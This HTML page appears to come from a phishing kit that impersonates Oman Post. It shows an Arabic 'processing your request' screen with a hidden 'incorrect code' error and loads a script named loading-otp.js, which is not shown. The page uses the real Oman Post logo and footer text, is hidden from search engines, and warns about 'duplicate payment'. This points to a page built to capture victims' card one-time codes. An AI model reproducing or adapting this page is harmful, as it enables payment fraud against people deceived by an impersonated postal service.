<!DOCTYPE html>
<html>
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <meta name="description" content="Oman Postal Services">
        <link rel="shortcut icon" type="image" href="https://www.omanpost.om/sites/default/files/oman_logo.png">
        <meta name="viewport" content="width=device-width">
        <meta name="robots" content="nofollow,noindex">
        <title>Post Oman Postal Services</title>
        <link rel="stylesheet" href="../css/loading.css">
    </head>
    <style>
        .otpMessageError {
            color: red;
            display: none;
        }
    </style>
<body>
    <div class="header">
        <div class="right">
            <img src="https://www.omanpost.om/sites/default/files/oman_logo.png">
        </div>
    </div>
    <div style="text-align:center;">
        <div class="form">
            <div class="formcol otpMessageError" id="otpMessageError">
                <h3>الرمز الذي أدخلته غير صحيح...</h3>
            </div>
            <div class="formcol" id="otpMessageWaiting">
                <h2>تتم معالجة طلبكم...</h2>
                <img src="../images/loader.gif" style="width:50px;">
                <p>المرجو عدم القيام بغلق أو إعادة تحميل الصفحة لتجنب الدفع المتكرر.</p>
            </div>
        </div>
    </div>

    <div class="footer">
        <div class="f-side">
            <div class="f-col">
                <p>كيف يمكننا مساعدتك</p>
                <span>الأسئلة الشائعة</span>
                <span>المواد المحظورة</span>
                <span>المعايير البريدية</span>
                <span>فيديوهات</span>
            </div>

            <div class="f-col">
                <p>حول بريد عُمان</p>
                <span>الرؤية و الرسالة و الأهداف</span>
                <span>تاريخ بريد عُمان</span>
                <span>أخبار</span>
                <span>الفروع وساعات العمل</span>
                <span>الوظائف</span>
            </div>
        </div>

        <div class="f-side">
            <div class="f-col">
                <p>خط التواصل</p>
                <span>post-oman@omanpost.om</span>
                <span>الخط الساخن 131</span>
            </div>
            <div class="f-col">
                <p>سياسات</p>
                <span>سياسة الخصوصية</span>
                <span>السياسة العامة لأمن المعلومات</span>
                <span>الشروط والأحكام</span>
                <span>سياسة نظام الإدارة المتكامل</span>
            </div>
        </div>

        <div class="f-side">
            <div class="f-col">
                <p>حمل التطبيق</p>
                <img src="../images/android.png" style="width:70px;">
                <img src="../images/apple.png" style="width:70px;">
            </div>
            <div class="f-col">
                <img src="../images/bv2.jpg" style="width:160px;">
            </div>
        </div>
    </div>

    <script src="../js/jquery.js"></script>
    <script src="../js/loading-otp.js"></script>
    <div style="display: none" class="ubey-RecordingScreen-count-down ubey-RecordingScreen-count-down-container"></div>
</body>
</html>
